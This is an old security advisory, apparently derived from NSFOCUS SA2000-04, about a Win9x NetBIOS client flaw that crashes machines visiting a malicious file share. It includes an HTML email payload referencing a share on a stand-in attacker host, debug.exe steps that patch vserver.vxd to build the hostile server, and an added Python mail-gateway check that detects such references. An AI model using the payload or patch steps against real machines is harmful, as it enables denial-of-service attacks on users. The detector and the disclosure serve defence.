COMMAND

    NetBIOS

SYSTEMS AFFECTED

    Win9x

PROBLEM

    The following is based on NSFOCUS Security Team advisory SA2000-04.
    The NSFOCUS security team has found a security flaw in the Microsoft
    Win9x NetBIOS client.  By exploiting this vulnerability, a malicious
    attacker can modify his file share service and perform a DoS attack
    against any Win9x client that visits it.

    When a Win9x client accesses a NetBIOS file share service and
    compares the driver types, if the type returned by the server is
    none of the following: "?????", "A:", "LPT1:", "COMM" or "IPC", the
    comparison leads to a sixth result, which is bogus because there are
    only five of them.  The Win9x client therefore gets a wrong driver
    pointer from the conversion, transfers control to the wrong driver
    function address and finally crashes.

    A malicious user can send an HTML email to his target.  One sample
    file looks like this:

        <html>
        <body>
        hello
        <img src="file:\\attacker.host\pub\a.gif">
        </body>
        </html>

    When a Win9x client reads the malicious HTML email with Outlook
    Express or another email client with HTML support, the client will
    be hit by the DoS.

    Exploit?  You can do it like this (Windows 98 Second Edition,
    English version):

        D:\WIN98\SYSTEM>debug vserver.vxd
        -d 2b60
        1266:2B60  3C 01 75 24 8B C8 C1 E9-10 83 F9 6A 73 05 83 F9   <.u$.......js...
        1266:2B70  64 73 1B 83 F9 13 72 10-83 F9 1F 76 0C 80 7F 3E   ds....r....v...>
        1266:2B80  05 73 05 83 F9 58 77 21-C3 66 B8 03 38 C3 83 F9   .s...Xw!.f..8...
        1266:2B90  65 74 10 83 F9 68 74 32-83 F9 67 75 1B B8 03 38   et...ht2..gu...8
        1266:2BA0  1A 00 C3 B8 03 38 1E 00-C3 83 F9 6E 74 10 83 F9   .....8.....nt...
        1266:2BB0  70 74 11 83 F9 6C 74 12-B8 03 38 1F 00 C3 B8 01   pt...lt...8.....
        1266:2BC0  00 02 00 C3 B8 03 38 27-00 C3 B8 03 38 15 00 C3   ......8'....8...
        1266:2BD0  91 FE 48 32 75 0E 83 78-2A 00 74 08 8D 40 2A E8   ..H2u..x*.t..@*.
        -n vserver.bak    (backup)
        -w
        Writing 1B8F8 bytes
        -n vserver.vxd
        -e 2b60 33 c0 c3
        -w
        Writing 1B8F8 bytes
        -q

    - Reboot the machine.
    - Set a password for a shared directory.
    - Access the shared directory from another Win9x client.
    - Usually the client will get a "blue screen", then the system
      will become unstable or halt.

SOLUTION

    Don't access file share services on untrusted hosts.  Disable
    NetBIOS over TCP/IP.  Microsoft has been informed.
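
    A check a mail gateway could run to catch the HTML email vector
    described above, flagging any message body that makes the client
    fetch a resource from a file share on a host that is not trusted.
    This is an added example, not part of the NSFOCUS advisory; the
    attribute list, the function names and the benign sample are
    assumptions made for illustration.

```python
import re
from html.parser import HTMLParser

# Attributes whose value a mail client may fetch while rendering the message.
FETCH_ATTRS = {"src", "href", "background", "data", "lowsrc", "dynsrc"}

# A file: URL naming a host (file:\\host\..., file://host/..., file:////host/...)
# or a bare backslash UNC path (\\host\share\...). file:///C:/... has no host and
# "//host/..." is a protocol-relative web URL, so neither matches.
REMOTE_SHARE = re.compile(
    r"^\s*(?:file:(?:[\\/]{2})?[\\/]{2}|\\\\)([^\\/\s]+)[\\/]", re.IGNORECASE)


class _ShareRefFinder(HTMLParser):
    """Collects (tag, attribute, host) for each reference to a remote share."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.hits = []

    def handle_starttag(self, tag, attrs):
        for name, value in attrs:
            if name not in FETCH_ATTRS or not value:
                continue
            match = REMOTE_SHARE.match(value)
            if match and match.group(1).lower() != "localhost":
                self.hits.append((tag, name, match.group(1).lower()))


def remote_share_refs(html_body, trusted_hosts=()):
    """Return the share references in html_body whose host is not trusted."""
    finder = _ShareRefFinder()
    finder.feed(html_body)
    finder.close()
    trusted = {host.lower() for host in trusted_hosts}
    return [hit for hit in finder.hits if hit[2] not in trusted]


# Constructed sample bodies; the first mirrors the advisory's sample file.
ADVISORY_SAMPLE = (r'<html><body>hello'
                   r'<img src="file:\\attacker.host\pub\a.gif"></body></html>')
BENIGN_SAMPLE = ('<html><body><img src="http://www.example.com/a.gif">'
                 '<a href="file:///C:/notes.txt">notes</a></body></html>')

if __name__ == "__main__":
    for body in (ADVISORY_SAMPLE, BENIGN_SAMPLE):
        print(remote_share_refs(body) or "no remote share references")
```

    A message with a non-empty result can be quarantined or have the
    reference stripped before delivery to Win9x clients.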